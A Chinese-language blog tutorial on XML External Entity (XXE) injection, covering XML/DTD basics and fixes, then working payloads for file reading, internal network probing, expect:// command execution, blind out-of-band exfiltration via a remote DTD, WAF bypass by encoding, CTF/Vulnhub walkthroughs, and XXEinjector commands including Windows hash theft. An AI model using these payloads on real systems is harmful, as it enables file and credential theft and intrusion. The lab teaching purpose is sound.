39:WEB漏洞-XXE&XML之利用检测绕过全解

思维导图

知识点

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。

XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML与HTML对比

  • XML被设计为传输和存储数据,其焦点是数据的内容。
  • HTML被设计用来显示数据,其焦点是数据的外观。
  • HTML旨在显示信息,而XML旨在传输信息。

Xml典型代码:

<!--XML声明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

DTD

文档类型定义(DTD)可定义合法的XML文档构建模块
它使用一系列合法的元素来定义文档的结构
DTD可被成行地声明于XML文档中,也可作为一个外部引用

(1)内部的DOCTYPE声明
<!DOCTYPE 根元素 [元素声明]>

(2)外部文档声明
<!DOCTYPE 根元素 SYSTEM "文件名">

DTD实体

(1)内部实体声明
<!ENTITY 实体名称 "实体的值">
(2)外部实体声明
<!ENTITY 实体名称 SYSTEM "URI">
(3)参数实体声明
<!ENTITY %实体名称 "实体的值">
<!ENTITY %实体名称 SYSTEM "URI">

XXE漏洞的修复与防御方案-PHP,Java,Python-过滤及禁用

方案1-禁用外部实体

PHP:
libxml_disable_entity_loader(true);

Java:
DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据

过滤关键字:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

补充-各脚本支持的协议

本课重点

  • 案例1:pikachu靶场XML数据传输测试-回显,玩法,协议,引入
  • 案例2:xxe-lab靶场登录框xml数据传输测试-检测发现
  • 案例3:CTF-Jarvis-OJ-Web-XXE安全真题复现-数据请求格式
  • 案例4:CTF-Vulnhub-XXE安全真题复现-检测,利用,拓展,实战
  • 案例5:xxe安全漏洞自动化注射脚本工具-XXEinjector(Ruby)

案例1:pikachu靶场XML数据传输测试-回显,玩法,协议,引入

存在xxe的情况下:

玩法1-读文件

如下脚本,将其复制粘贴,提交,成功读取pikachu服务器某文件内容

<?xml version = "1.0"?>
<!DOCTYPE ANY [
	<!ENTITY xxe SYSTEM "file:///d://test.txt"> 
]>
<x>&xxe;</x>
//xxe为变量,读取test.txt
//打印出来
//用file协议读指定路径的文件

显示结果:

玩法2-内网探针或攻击内网应用(触发漏洞地址)

如下脚本,将其复制粘贴,提交,返回为空。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" >
]>
<x>&rabbit;</x>

返回为空,说明内网中192.168.0.103服务器上,index.txt文件是存在的,也可以说8081端口是开放的,因此这里这个xxe漏洞,可以实现内网探针。

为什么这里返回为空,说明index.txt文件是存在的?因为如下测试显示,改为不存在的1132323.txt后,服务器返回一行报错信息。

玩法3-RCE

读CASE是在安装expect扩展的PHP环境里执行系统命令

<?xml version="1.0" ?>
<!DOCTYPE ANY [
	<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>

由于本地环境未安装expect扩展,因此该玩法未测试。

玩法4-引入外部实体dtd

<?xml version="1.0" ?>
<!DOCTYPE test [
	<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
	%file;
]>
<x>&send;</x>
//引入外部实体dtd,dtd就是xml的后缀,识别为xml格式
//如果设置了禁止外部实体引用,将会失效

可以在远程攻击者服务器(127.0.0.1)上保存的evil2.dtd写上:

<!ENTITY send SYSTEM "file:///d:/test.txt">

引入外部实体dtd,核心代码在drd文件中,一方面是为了绕过一些服务器的限制,另一方面是为了自定义一些攻击代码,类似于远程文件包含漏洞。如下图,成功回显服务器上文件内容。

玩法5-无回显-读取文件

pikachu注释掉回显代码,构造无回显的环境

如下脚本

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>

本地192.168.0.103上构造test.dtd:

<!ENTITY % payload
"<!ENTITY % send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;

此时把脚本复制粘贴,提交,服务器不再返回任何信息

本地开启日志,查找日志就可以看到test.txt数据了。

将数据base64解码,得到原始数据。

玩法6-协议-读文件(绕过)

1、ENTITY``SYSTEM``file等关键词被过滤-->使用编码方式绕过:UTF-16BE

cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml

2、http被过滤-->可以使用其他协议绕过,比如data://协议、file://协议加文件上传、php://filter协议加文件上传

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>

3、绕过WAF保护的XXE-->

  • 方法1:文档中的额外空格
  • 方法2:格式无效
  • 方法3:外来编码(Exotic encodings)
  • 方法4:在一个文档中使用两种类型的编码

参考:

https://www.cnblogs.com/20175211lyz/p/11413335.html

http://www.cl4y.top/xxe%e7%ac%94%e8%ae%b0/

https://lab.wallarm.com/xxe-that-can-bypass-waf-protection-98f679452ce0/

案例2:xxe-lab靶场登录框xml数据传输测试-检测发现

如何检测发现xxe漏洞?

  • 1.提交的数据包含xml格式如: <forgot><username>admin</username></forgot>
  • 2.请求头中如:Content-Type: text/xml或Content-Type: application/xml
  • 3.盲猜:更改content-type值application/xml看返回

靶场下载地址:https://github.com/c0ny1/xxe-lab

以xxe-lab靶场登录框为例,使用burp抓包时,可以右击send to Spider自动爬行网站,所有的网站数据包会在Proxy-History模块显示。

此时可以全局搜索xml关键字

也可以查看MIME type类型是否为XML,MIME type类型为XML对应Content-Type: text/xml或Content-Type: application/xml,对应内容形式如下:<user><username>2</username><password>2</password></user>

找到xxe漏洞点后,使用如下脚本攻击测试,成功读取到服务器上文件内容。

<?xml version = "1.0"?>
<!DOCTYPE Mikasa [ 
<!ENTITY test SYSTEM "file:///d:/test.txt"> 
]>
<user><username>&test;</username><password>Mikasa</password></user>

显示如下

案例3:CTF-Jarvis-OJ-Web-XXE安全真题复现-数据请求格式

真题地址:http://web.jarvisoj.com:9882/

抓包如下,数据包使用的是json格式,此处使用盲猜的方法检测是否存在xxe漏洞。

更改请求数据格式为:application/xml,使用以下脚本,成功读取服务器文件passwd内容。

<?xml version = "1.0"?>
<!DOCTYPE ANY [ 
	<!ENTITY f SYSTEM "file:///etc/passwd"> 
]>
<x>&f;</x>

案例4:CTF-Vulnhub-XXE安全真题复现-检测,利用,拓展,实战

很多靶场镜像的网站:https://vulnhub.com

本案例靶场下载地址:https://download.vulnhub.com/xxe/XXE.zip 

利用过程:扫描IP及端口-->扫描探测目录-->抓包探针xxe安全-->利用xxe读取源码-->flag指向文件-->base32 64解密-->php运行-->flag

<1>在本机虚拟机环境安装靶场,靶场安装后,由于我们不知道用户名密码,无法进入(一般镜像环境不会告诉你用户名密码,防止你进入后直接查看后台源码);

<2>同时在本机虚拟机环境安装安装忍者系统,打开忍者系统,查看自身IP为192.168.64.135;

<3>在忍者系统扫描同网段:nmap -sS 192.168.64.1/24,成功得到靶机的IP及开放端口。

<4>在浏览器打开如下

<5>由于这是一个web网站,我们可以尝试扫描web目录,或者直接查看robots.txt找到关键目录。

<6>进入/xxe/目录,发现是个登录框。

<7>尝试抓包查看,发现登录参数采用xml格式传输,猜测这里有xxe漏洞。

<8>尝试攻击一下,利用以下脚本读取xxe.php源码。

<?xml version="1.0" ?>
<!DOCTYPE r [
    <!ENTITY r ANY >
	<!ENTITY ap SYSTEM "php://filter/read=convert.base64-decode/resource=xxe.php">
    %a;
]>
<root><name>≈</name><password>hj</password></root>

成功回显

PS:这里为什么使用php://filter协议而不是使用file://协议呢?原因是php://filter协议读取文件时,不需要文件的绝对地址,而file://协议需要文件的绝对地址。

<9>将xxe.php改为admin.php,成功读取admin.php源码

<10>base64解码源代码后,分析,成功找到用户名密码。

<11>密码是md5散列后的值,将其解密后得到原始密码为admin@123,使用用户名密码登录网站。

<12>登录成功后,显示如下页面,点击flag。

<13>点击flag后,跳转到flagmeout.php页面,但是显示无法打开该页面。

<14>再次尝试读取flagmeout.php页面源代码。

<?xml version="1.0" ?>
<!DOCTYPE r [
    <!ENTITY r ANY >
	<!ENTITY ap SYSTEM "php://filter/read=convert.base64-decode/resource=./flagmeout.php">
    %a;
]>
<root><name>≈</name><password>hj</password></root>

这里由于flagmeout.php文件在根目录下,而不是在/xxe/目录下,因此读取时需要写为./flagmeout.php。

成功回显

<15>base64解码源代码,找到加密后的flag。

<16>分析flag,发现是base32编码,将其在线解码,得到字符串如下。

<17>该字符串是base64编码,再将其base64解码,成功得到flag地址:/etc/.flag.php

<18>继续使用脚本读取该文件

<19>base64解码如下,分析,这是一段php代码。

<20>将这段PHP代码在线运行一下,成功得到flag。

 

案例5:xxe安全漏洞自动化注射脚本工具-XXEinjector(Ruby)

XXEinjector是一款基于Ruby的XXE注入工具,它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。

运行前提:Ruby运行环境,建议在kali环境下运行。

基本参数详解

--host      	必填项– 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file      	必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path          必填项-是否需要枚举目录 – 枚举路径。(--path=/etc)
--brute         必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger        记录输出结果。
--rhost         远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport         远程主机的TCP端口信息。(--rport=8080)
--phpfilter    	在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc     	使用netdoc协议。(Java).
--enumports   	枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes       	窃取运行当前应用程序用户的Windows哈希。
--expect        使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload       	使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt      	XSLT注入测试。
--ssl           使用SSL。
--proxy         使用代理。(--proxy=127.0.0.1:8080)
--httpport Set	自定义HTTP端口。(--httpport=80)
--ftpport       设置自定义FTP端口。(--ftpport=21)
--gopherport  	设置自定义gopher端口。(--gopherport=70)
--jarport       设置自定义文件上传端口。(--jarport=1337)
--xsltport  	设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test     		该模式可用于测试请求的有效。
--urlencode     URL编码,默认为URI。
--output       	爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout     	设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout  	设置与服务器断开连接的,防止DoS出现。(--contimeout=20)
--fast     		跳过枚举询问,有可能出现结果假阳性。
--verbose     显示verbose信息。

XXEinjector使用样例

枚举HTTPS应用程序中的/etc目录:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl

使用gopher(OOB方法)枚举/etc目录:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

二次漏洞利用:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt

使用HTTP带外方法和netdoc协议对文件进行爆破攻击:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc

通过直接性漏洞利用方式进行资源枚举:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

枚举未过滤的端口:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

窃取Windows哈希:
ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes

使用Java jar上传文件:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf

使用PHP expect执行系统指令:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls

测试XSLT注入:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt

记录请求信息:
ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt

XXEinjector下载地址:https://github.com/enjoiz/XXEinjector

演示:下载,进入目录,执行命令(此处环境为忍者系统)

忍者系统还集成了很多xxe的payload,可以供我们直接利用。

参考:https://www.cnblogs.com/bmjoker/p/9614990.html

 

posted @ 2022-01-17 17:08  zhengna  阅读(3446)  评论(0编辑  收藏  举报